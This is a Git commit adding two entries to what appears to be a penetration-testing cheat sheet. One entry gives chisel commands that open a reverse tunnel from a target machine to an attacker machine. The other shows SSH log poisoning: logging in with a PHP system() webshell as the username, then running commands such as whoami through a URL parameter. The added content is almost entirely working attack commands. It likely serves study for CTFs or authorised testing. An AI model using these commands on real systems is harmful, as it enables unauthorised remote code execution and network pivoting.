Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-03-20 11:39:52 +00:00 committed by GitHub
parent af3be40d54
commit 21c5e7ee71
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -160,6 +160,13 @@ $ kill %1
Login as any user to see that it gets logged then try to login with a malicious php code
### Port Forwarding using chisel
On attacker machine `/chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse`
On target machine `./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>`
### Poisining ssh auth log
`ssh '<?php system($_GET['a']); ?>'@192.168.43.2`
Then `http://ip/page?a=whoami;`